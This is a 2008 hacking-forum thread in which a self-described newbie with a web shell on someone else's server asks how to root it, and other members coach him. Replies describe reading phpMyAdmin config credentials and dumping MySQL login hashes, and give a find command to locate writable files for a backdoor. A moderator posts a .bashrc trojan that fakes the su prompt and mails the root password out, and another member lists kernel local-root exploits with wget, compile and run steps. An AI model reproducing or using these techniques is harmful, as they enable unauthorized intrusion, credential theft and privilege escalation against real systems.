 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Need HELP "uid=99(nobody) gid=99(nobody) groups=99(nobo |
 |
 Posted: Mon Dec 01, 2008 5:11 pm |
 |
|
| hottox |
| Regular user |
 |
|
| Joined: Nov 23, 2008 |
| Posts: 19 |
|
|
|
 |
|
 |
|
Hi,
i've got a shell on a web server,
the probleme is that i can't chmod, and i can't find writeable folders || files,
| Quote: | Software: Apache/1.3.34 (Unix) PHP/4.4.2 FrontPage/5.0.2.2510
uname -a: Linux ************ 2.4.30-cisec-p5 #49 SMP Tue Jun 7 13:26:43 CDT 2005 i686
uid=99(nobody) gid=99(nobody) groups=99(nobody)
Safe-mode: OFF (not secure) |
i'm a newbie, but i think that this server can be rooted,
i can give more information about the server,
please help
Waiting your answers. |
|
|
|
|
|
put a bind backdoor |
|
| Posted: Mon Dec 01, 2008 7:08 pm |
|
|
| spankyz |
| Beginner |
 |
|
| Joined: Dec 01, 2008 |
| Posts: 3 |
|
|
|
|
|
|
|
if u put a backdoor u can access this in telnet and depends what port...
when ur logged in its easy to use an exploit...
YM me to test some of ur shells...
spankyz202000@ym |
|
|
|
|
|
|
|
|
| Posted: Mon Dec 01, 2008 7:28 pm |
|
|
| lenny |
| Valuable expert |
 |
|
| Joined: May 15, 2008 |
| Posts: 275 |
|
|
|
|
|
|
|
I got hold of the IP of your vulnerable webserver (don't ask :p) and took a quick look around. As you are running as nobody, you have very little control over anything.
I did find one area of great interest though, the phpmyadmin config.inc.php is readable which contained the username and password (in plain text) of a read-only MySQL user (pma control user). Along with details from details from the hosts file and the httpd.conf file, I was able to find a domain on the server hosting phpMyAdmin.
With access to the PMA user (called "mysqlread" on this server If i recall correctly) I was able to read the phpMyAdmin (and MySQL too, I assume) login details for *every* user, including Root.
This is where I stopped however, because I couldn't be bothered to crack the MySQL (version 3) hash that would give me root access (And im not black hat, I refuse to dig any deeper because It would probably lead to big problems for the company involved.)
Also, If human nature rears its ugly head then the sysadmin is probably lazy. Lazy sysadmins usually use the same password for everything, so If you get ahold of the root password for MySQL then you probably have the root password for the entire server as well.
I won't tell you the passwords or where to look for the files - Its simple, find them yourself 
Any questions?
(edit, oh - and don't use the C99 shell - Its not exactly subtle and stands out like crazy. Its also a little script-kiddy-like, and you wouldn't want anybody thinking you were a script kiddie would you?  ) |
|
Last edited by lenny on Mon Dec 01, 2008 7:31 pm; edited 1 time in total |
|
|
|
|
|
|
|
| Posted: Mon Dec 01, 2008 7:30 pm |
|
|
| hottox |
| Regular user |
|
|
| Joined: Nov 23, 2008 |
| Posts: 19 |
|
|
|
|
|
|
|
| i said that i can't find writeable folders, |
|
|
|
|
| Posted: Mon Dec 01, 2008 7:32 pm |
|
|
| lenny |
| Valuable expert |
|
|
| Joined: May 15, 2008 |
| Posts: 275 |
|
|
|
|
|
|
|
No, you are running as nobody - you cant chown, chmod or chgrp files that you dont own. Try running this to find writable files
|
|
|
|
|
| Posted: Mon Dec 01, 2008 7:47 pm |
|
|
| hottox |
| Regular user |
|
|
| Joined: Nov 23, 2008 |
| Posts: 19 |
|
|
|
|
|
|
|
Thanks lenny, and i want you to know that i'm not black hate,
i'm looking for a writable folder where i can put a backdoor,
i used
the result seems to be positif
can i run a perl script from any directory ????? |
|
|
|
|
|
|
|
|
| Posted: Mon Dec 01, 2008 7:55 pm |
|
|
| lenny |
| Valuable expert |
|
|
| Joined: May 15, 2008 |
| Posts: 275 |
|
|
|
|
|
|
|
ok, try this:
| Code: | | find / -perm -2 -ls |
From here it brings up about 750 writable files and directories
These look usefull, but I didn't investigate:
| Quote: | 15463 0 lrwxrwxrwx 1 root root 10 Oct 5 2004 /www3 -> /home3/www
15464 0 lrwxrwxrwx 1 root root 9 Oct 5 2004 /ftp -> /home/ftp
15465 0 lrwxrwxrwx 1 root root 10 Oct 5 2004 /ftp2 -> /home2/ftp
15466 0 lrwxrwxrwx 1 root root 10 Oct 5 2004 /ftp3 -> /home3/ftp
15467 0 lrwxrwxrwx 1 root root 19 Oct 5 2004 /.bash_profile -> /root/.bash_profile
15468 0 lrwxrwxrwx 1 root root 13 Oct 5 2004 /.bashrc -> /root/.bashrc
14504 0 lrwxrwxrwx 1 root root 12 Apr 10 2006 /library -> /usr/lib/cgi |
and...
| Quote: | 15460 0 lrwxrwxrwx 1 root root 10 Oct 5 2004 /www2 -> /home2/www
25 0 lrwxrwxrwx 1 root root 7 Oct 5 2004 /home2/www/cgi-bin/cgiwrapd -> cgiwrap
26 0 lrwxrwxrwx 1 root root 7 Oct 5 2004 /home2/www/cgi-bin/nph-cgiwrap -> cgiwrap
27 0 lrwxrwxrwx 1 root root 7 Oct 5 2004 /home2/www/cgi-bin/nph-cgiwrapd -> cgiwrap
311 0 -rw-rw-rw- 1 root root 0 Nov 9 2001 /home2/www/icons/_vti_pvt/frontpg.lck
419 0 lrwxrwxrwx 1 root root 14 Oct 5 2004 /home2/www/logs -> /var/log/httpd
420 0 lrwxrwxrwx 1 root root 22 Oct 5 2004 /home2/www/phpMyAdmin -> /usr/local/phpMyAdmin/
13566007 0 lrwxrwxrwx 1 root root 13 Nov 15 2005 /home2/www/*/anonftp -> /ftp/*
13566008 0 lrwxrwxrwx 1 * * 22 Nov 15 2005 /home2/www/*/wusage -> /home/*/.wusage
13566011 0 lrwxrwxrwx 1 root root 24 Nov 15 2005 /home2/www/*/error-log -> /var/log/httpd/error_log
13566021 0 lrwxrwxrwx 1 * * 27 Nov 15 2005 /home2/www/*/mail -> /www/*/cgi-bin/wmail
13566024 0 lrwxrwxrwx 1 root * 13 Nov 15 2005 /home2/www/*/* -> /www/*
13566025 0 lrwxrwxrwx 1 * * 21 Nov 15 2005 /home2/www/*/phpMyAdmin -> /usr/local/phpMyAdmin |
Had to censor a few directories and files, but shouldn't be hard to work out who is who I replaced the name of a certain user with a single "*" where his name should have been |
|
|
|
|
|
|
|
|
| Posted: Mon Dec 01, 2008 8:35 pm |
|
|
| capt |
| Advanced user |
|
|
| Joined: Nov 04, 2008 |
| Posts: 232 |
|
|
|
|
|
|
|
Many servers dont containg the /usr/local/phpmyadmin/ and its config plain as day. Got lucky  |
|
|
|
|
| Posted: Tue Dec 02, 2008 11:08 am |
|
|
| hottox |
| Regular user |
|
|
| Joined: Nov 23, 2008 |
| Posts: 19 |
|
|
|
|
|
|
|
i uploaded a BACKDOOR but with no succes 
I do not want passwords, all I want is to have a shell access "for the first time" 
please help |
|
|
|
|
| Posted: Tue Dec 02, 2008 4:43 pm |
|
|
| lenny |
| Valuable expert |
|
|
| Joined: May 15, 2008 |
| Posts: 275 |
|
|
|
|
|
|
|
But as I said, you are running as nobody - you have virtuall no permissions! Even if you get a shell, you are still right back in the same place you started, execpt with a terminal window to look at instead of the C99 shell.
You *need* to gain a few permissions before you can do anything interesting, and the best way to do that is to gain access to a few more accounts. |
|
|
|
|
| Posted: Tue Dec 02, 2008 7:10 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
Social engineering rockzzzzzzzzz.  |
|
|
|
|
| Posted: Tue Dec 02, 2008 7:53 pm |
|
|
| lenny |
| Valuable expert |
|
|
| Joined: May 15, 2008 |
| Posts: 275 |
|
|
|
|
|
|
|
| Indeed it does |
|
|
|
|
| Posted: Wed Dec 03, 2008 11:22 am |
|
|
| hottox |
| Regular user |
|
|
| Joined: Nov 23, 2008 |
| Posts: 19 |
|
|
|
|
|
|
|
as i said "i'm a newbie",so i'll do what you said.
thaaaaanks for help,  |
|
|
|
|
|
|
|
|
| Posted: Thu Dec 04, 2008 1:37 pm |
|
|
| ToXiC |
| Moderator |
 |
|
| Joined: Dec 01, 2004 |
| Posts: 181 |
| Location: Cyprus |
|
|
|
|
|
|
hmmm why dont you try something like this....
CAN be done only if you have access to .bashrc
You can receive the root password on your email in plain text . They only thing you need is user access to modify .bashrc
lets see the procedure step by step:
you first copy the .bashrc to .bashrc. so you can restore it and cover your tracks after you receive the password.
you then modify .bashrc as follows:
.bashrc
alias su=/var/tmp/text.log
echo "Password:";read pass
if [ $pass = "" ] > .es
echo "su: incorrect password"
echo $pass > /tmp/pass.log
mail yourmail@mail.com < /tmp/pass.log
rm /tmp/pass.log
then
rm .es
rm /var/tmp/test.log
cp ~/.bashrc. ~/.bashrc
rm ~/.bashrc.
su
fi
chmod +x /var/tmp/text.log
Social Engineering - Phishing |
|
_________________
who|grep -i blonde|talk; cd~;wine;talk;touch;unzip;touch; strip;gasp;finger;gasp;mount; fsck; more; yes; gasp; umount; make clean; sleep;wakeup;goto http://www.md5this.com |
|
|
|
|
|
|
|
| Posted: Sun May 10, 2009 9:04 am |
|
|
| xF34Rx |
| Regular user |
 |
|
| Joined: May 10, 2009 |
| Posts: 23 |
|
|
|
|
|
|
|
You gotta root the box.
The output is the server version.Search the numbers on milw0rm.
List of public exploits I know about:
| Code: | 2.2 -> ptrace
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
2.6.23 - 2.6.24 -> diane_lane_fucked_hard.c
2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c(vmsplice) |
Let's say it was vulnerable to vmsplice..
| Code: | | wget http://www.milw0rm.com/exploits/5092 |
Downloads the exploit.
| Code: | | gcc 5092 -o exploit |
Compiles the exploit.
Executes the exploit.
You should be root by now if its vulnerable.
Just type whoami;id to make sure |
|
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 74
Members: 0
Total: 74
